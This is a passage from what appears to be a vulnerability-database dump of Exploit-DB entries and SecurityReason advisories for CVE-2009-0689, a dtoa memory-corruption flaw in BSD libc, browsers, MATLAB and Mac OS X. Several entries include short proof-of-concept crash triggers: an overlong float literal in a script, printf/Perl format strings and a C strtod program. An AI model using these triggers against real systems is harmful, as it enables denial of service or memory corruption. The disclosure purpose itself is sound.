fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. Contact ---\r\nEmail:\r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com\r\n\r\nGPG:\r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAksF4lEACgkQpiCeOKaYa9ZD+ACfSoaEiTeQrFDgtcHgOckyXMom\r\nTE4AoJW3meP7KP6Xb7KNErVlsluLUO8E\r\n=jTmp\r\n-----END PGP SIGNATURE-----\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/10184/"}, {"lastseen": "2016-02-03T18:55:31", "description": "Mozilla Firefox 3.5.3 Floating Point Conversion Heap Overflow Vulnerability. CVE-2009-0689. Dos exploit for linux platform", "published": "2009-10-27T00:00:00", "type": "exploitdb", "title": "Mozilla Firefox <= 3.5.3 - Floating Point Conversion Heap Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2009-10-27T00:00:00", "id": "EDB-ID:33312", "href": "https://www.exploit-db.com/exploits/33312/", "sourceData": "source: http://www.securityfocus.com/bid/36851/info\r\n\r\nMozilla Firefox is prone to a heap-based buffer-overflow vulnerability.\r\n\r\nAn attacker can exploit this issue by tricking a victim into visiting a malicious webpage to execute arbitrary code and to cause denial-of-service conditions.\r\n\r\nNOTE: This issue was previously covered in BID 36843 (Mozilla Firefox and SeaMonkey MFSA 2009-52 through -64 Multiple Vulnerabilities).\r\n\r\nNOTE 2: This issue is related to BID 35510 (Multiple BSD Distributions 'gdtoa/misc.c' Memory Corruption Vulnerability), but because of differences in the code base, it is being assigned its own record.\r\n\r\n<script>\r\nvar a=0.<?php echo str_repeat(\"1\",296450); ?>;\r\n</script> ", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/33312/"}, {"lastseen": "2016-02-03T18:23:14", "description": "Multiple BSD Distributions 'gdtoa/misc.c' Memory Corruption Vulnerability. CVE-2009-0689. Dos exploits for multiple platform", "published": "2009-05-26T00:00:00", "type": "exploitdb", "title": "Multiple BSD Distributions 'gdtoa/misc.c' Memory Corruption Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2009-05-26T00:00:00", "id": "EDB-ID:33058", "href": "https://www.exploit-db.com/exploits/33058/", "sourceData": "source: http://www.securityfocus.com/bid/35510/info\r\n\r\nMultiple BSD distributions are prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index.\r\n\r\nAttackers may exploit this issue to execute arbitrary code within the context of affected applications.\r\n\r\nThe following are vulnerable:\r\n\r\nOpenBSD 4.5\r\nNetBSD 5.0\r\nFreeBSD 6.4 and 7.2\r\n\r\nOther software based on the BSD code base may also be affected. \r\n\r\nThe following proof-of-concept shell commands are available:\r\n\r\nprintf %1.262159f 1.1\r\nprintf %11.2109999999f\r\nprintf %11.2009999999f\r\nprintf %11.2009999999f\r\n\r\nThe following proof-of-concept Perl script is available:\r\n\r\n#!/usr/local/bin/perl\r\nprintf \"%0.4194310f\", 0x0.0x41414141;\r\n\r\nThe following proof-of-concept J program is available:\r\n\r\ncxib=0.<?php echo str_repeat(\"1\",296450); ?> ", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/33058/"}, {"lastseen": "2016-02-03T19:17:17", "description": "MATLAB R2009b 'dtoa' Implementation Memory Corruption Vulnerability. CVE-2009-0689. Dos exploit for linux platform", "published": "2010-01-08T00:00:00", "type": "exploitdb", "title": "MATLAB R2009b - 'dtoa' Implementation Memory Corruption Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2010-01-08T00:00:00", "id": "EDB-ID:33480", "href": "https://www.exploit-db.com/exploits/33480/", "sourceData": "source: http://www.securityfocus.com/bid/37688/info\r\n\r\nMATLAB is prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index.\r\n\r\nAttackers may exploit this issue to execute arbitrary code within the context of affected applications.\r\n\r\nMATLAB R2009b is affected; other versions may also be vulnerable. \r\n\r\ncxib=0.<?php echo str_repeat(\"1\",296450); ?> ", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/33480/"}, {"lastseen": "2016-02-03T19:17:09", "description": "Mac OS X 10.x 'libc/strtod(3)' Memory Corruption Vulnerability. CVE-2009-0689. Dos exploit for osx platform", "published": "2010-01-08T00:00:00", "type": "exploitdb", "title": "Mac OS X 10.x - 'libc/strtod3' Memory Corruption Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2010-01-08T00:00:00", "id": "EDB-ID:33479", "href": "https://www.exploit-db.com/exploits/33479/", "sourceData": "source: http://www.securityfocus.com/bid/37687/info\r\n\r\nMac OS X is prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index.\r\n\r\nAttackers may exploit this issue to execute arbitrary code within the context of affected applications.\r\n\r\nMac OS X 10.5 and 10.6 are affected; other versions may also be vulnerable. \r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\nint main ()\r\n{\r\nchar number[] = \"0.1111111111...11\", *e;\r\ndouble weed = strtod(number, &e);\r\nprintf(\"grams = %lf\\n\", weed);\r\nreturn 0;\r\n} ", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/33479/"}, {"lastseen": "2016-02-01T12:00:22", "description": "K-Meleon 1.5.3 Remote Array Overrun. CVE-2009-0689. Dos exploit for bsd platform", "published": "2009-11-19T00:00:00", "type": "exploitdb", "title": "K-Meleon 1.5.3 - Remote Array Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2009-11-19T00:00:00", "id": "EDB-ID:10186", "href": "https://www.exploit-db.com/exploits/10186/", "sourceData": "From Full Disclosure: http://seclists.org/fulldisclosure/2009/Nov/222\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 20.11.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - K-Meleon 1.5.3\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/72\r\n\r\n\r\n- --- 0.Description ---\r\nK-Meleon is an extremely fast, customizable, lightweight web browser\r\nbased on the Gecko layout engine developed by Mozilla which is also used\r\nby Firefox. K-Meleon is free, open source software released under the\r\nGNU General Public License and is designed specifically for Microsoft\r\nWindows (Win32) operating systems.\r\n\r\n\r\n- --- 1. K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ---\r\nThe main problem exist in dtoa implementation. K-Meleon has the same\r\ndtoa as a KDE, Opera and all BSD systems. This issue has been fixed in\r\nFirefox 3.5.4 and fix\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut fix for SREASONRES:20090625, used by openbsd was not good.\r\nMore information about fix for openbsd and similars SREASONRES:20091030,\r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create any number of float, which will overwrite the memory. In\r\nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it\r\nis possible to call 16<= elements of freelist array.\r\n\r\n\r\n- --- 2. Proof of Concept (PoC) ---\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat(\"1\",296450); ?>;\r\n</script>\r\n- -----------------------\r\n\r\nK-Meleon will crash with\r\n\r\nUnhandled exception at 0x01800754 in k-meleon.exe: 0xC0000005: Access\r\nviolation reading location 0x0bc576ec.\r\n\r\n01800754 mov eax,dword ptr [ecx]\r\n\r\nEAX 00000002 \r\nECX 0BC576EC \r\nEDI 028FEB51 \r\n\r\n\r\n- --- 3. SecurityReason Note ---\r\n\r\nOfficialy SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - KDE (example: konqueror)\r\n- - Opera\r\n- - K-Meleon\r\n\r\nThis list is not yet closed. US-CERT declared that will inform all\r\nvendors about this issue, however, they did not do it. Even greater\r\nconfusion caused new CVE number \"CVE-2009-1563\". Secunia has informed\r\nthat this vulnerability was only detected in Mozilla Firefox, but nobody\r\nwas aware that the problem affects other products like ( KDE, Chrome )\r\nand it is based on \"CVE-2009-0689\". After some time Mozilla Foundation\r\nSecurity Advisory\r\n(\"http://www.mozilla.org/security/announce/2009/mfsa2009-59.html\";)\r\nwas updated with note :\r\n\"The underlying flaw in the dtoa routines used by Mozilla appears to be\r\nessentially the same as that reported against the libc gdtoa routine by\r\nMaksymilian Arciemowicz ( CVE-2009-0689)\".\r\nThis fact ( new CVE number for Firefox Vulnerability )and PoC in\r\njavascript (from Secunia), forced us to official notification all other\r\nvendors. We publish all the individual advisories, to formally show all\r\nvulnerable software and to avoid wrong CVE number. We do not see any\r\nother way to fix this issue in all products.\r\n\r\nPlease note:\r\nPatch used in Firefox 3.5.4 does not fully solve the problem. Dtoa\r\nalgorithm is not optimal and allows remote Denial of Service in Firefox\r\n3.5.5 giving long float number.\r\n\r\n\r\n- --- 4. Fix ---\r\nNetBSD fix (optimal):\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. Contact ---\r\nEmail:\r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com\r\n\r\nGPG:\r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAksF4ZoACgkQpiCeOKaYa9bJsACgqjmxJmR9BORNOK3YhNUeyz+o\r\nl8EAn2V+5mXH7GLWp+btWMf+4fGDeIzw\r\n=Zqoe\r\n-----END PGP SIGNATURE-----\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/10186/"}, {"lastseen": "2016-02-01T12:00:15", "description": "SeaMonkey 1.1.8 Remote Array Overrun. CVE-2009-0689. Dos exploit for bsd platform", "published": "2009-11-19T00:00:00", "type": "exploitdb", "title": "SeaMonkey 1.1.8 - Remote Array Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2009-11-19T00:00:00", "id": "EDB-ID:10185", "href": "https://www.exploit-db.com/exploits/10185/", "sourceData": "From Full Disclosure: http://seclists.org/fulldisclosure/2009/Nov/221\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ SeaMonkey 1.1.8 Remote Array Overrun (Arbitrary code execution) ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 20.11.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - SeaMonkey 1.1.18\r\n\r\nFixed in:\r\n- - SeaMonkey 2.0\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/71\r\n\r\n\r\n- --- 0.Description ---\r\nThe SeaMonkey project is a community effort to develop the SeaMonkey\r\nall-in-one internet application suite (see below). Such a software suite\r\nwas previously made popular by Netscape and Mozilla, and the SeaMonkey\r\nproject continues to develop and deliver high-quality updates to this\r\nconcept. Containing an Internet browser, email & newsgroup client with\r\nan included web feed reader, HTML editor, IRC chat and web development\r\ntools, SeaMonkey is sure to appeal to advanced users, web developers and\r\ncorporate users.\r\n\r\n\r\n- --- 1. SeaMonkey 1.1.18 Remote Array Overrun (Arbitrary code\r\nexecution) ---\r\nThe main problem exist in dtoa implementation. SeaMonkey has the same\r\ndtoa as a KDE, Opera and all BSD systems. This issue has been fixed in\r\nFirefox 3.5.4 and fix\r\n\r\nhttp://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&whitespace_mode=show&file=jsdtoa.c&branch=&root=/cvsroot&subdir=mozilla/js/src&command=DIFF_FRAMESET&rev1=3.41&rev2=3.42\r\n\r\nhas been used to patch SeaMonkey 2.0.\r\n\r\nThis flaw has been detected in may 2009 and signed SREASONRES:20090625.\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut fix for SREASONRES:20090625, used by openbsd was not good.\r\nMore information about fix for openbsd and similars SREASONRES:20091030,\r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create any number of float, which will overwrite the memory. In\r\nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it\r\nis possible to call 16<= elements of freelist array.\r\n\r\n\r\n- --- 2. Proof of Concept (PoC) ---\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat(\"9\",299999); ?>;\r\n</script>\r\n- -----------------------\r\n\r\nIf we use SeaMonkey to see this PoC, SeaMonkey will crash. For example\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat(\"1\",296450); ?>;\r\n</script>\r\n- -----------------------\r\n\r\n127# gdb seamonkey-bin seamonkey-bin.core\r\n...\r\n#0 0x28df0ecb in ?? ()\r\n...\r\n(gdb) i r\r\neax 0x0 0\r\necx 0x2 2\r\nedx 0xbfbfd2fc -1077947652\r\nebx 0x28da9b6c 685415276\r\nesp 0xbfbfd2ac 0xbfbfd2ac\r\nebp 0xbfbfd2c8 0xbfbfd2c8\r\nesi 0xb 11\r\nedi 0xb 11\r\neip 0x28df0ecb 0x28df0ecb\r\n...\r\n\r\nesi = esi = 11\r\n\r\n\r\n- --- 3. SecurityReason Note ---\r\n\r\nOfficialy SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - KDE (example: konqueror)\r\n- - Opera\r\n- - K-Meleon\r\n\r\nThis list is not yet closed. US-CERT declared that will inform all\r\nvendors about this issue, however, they did not do it. Even greater\r\nconfusion caused new CVE number \"CVE-2009-1563\". Secunia has informed\r\nthat this vulnerability was only detected in Mozilla Firefox, but nobody\r\nwas aware that the problem affects other products like ( KDE, Chrome )\r\nand it is based on \"CVE-2009-0689\". After some time Mozilla Foundation\r\nSecurity Advisory\r\n(\"http://www.mozilla.org/security/announce/2009/mfsa2009-59.html\";)\r\nwas updated with note :\r\n\"The underlying flaw in the dtoa routines used by Mozilla appears to be\r\nessentially the same as that reported against the libc gdtoa routine by\r\nMaksymilian Arciemowicz ( CVE-2009-0689)\".\r\nThis fact ( new CVE number for Firefox Vulnerability )and PoC in\r\njavascript (from Secunia), forced us to official notification all other\r\nvendors. We publish all the individual advisories, to formally show all\r\nvulnerable software and to avoid wrong CVE number. We do not see any\r\nother way to fix this issue in all products.\r\n\r\nPlease note:\r\nPatch used in Firefox 3.5.4 does not fully solve the problem. Dtoa\r\nalgorithm is not optimal and allows remote Denial of Service in Firefox\r\n3.5.5 giving long float number.\r\n\r\n\r\n- --- 4. Fix ---\r\nNetBSD fix (optimal):\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/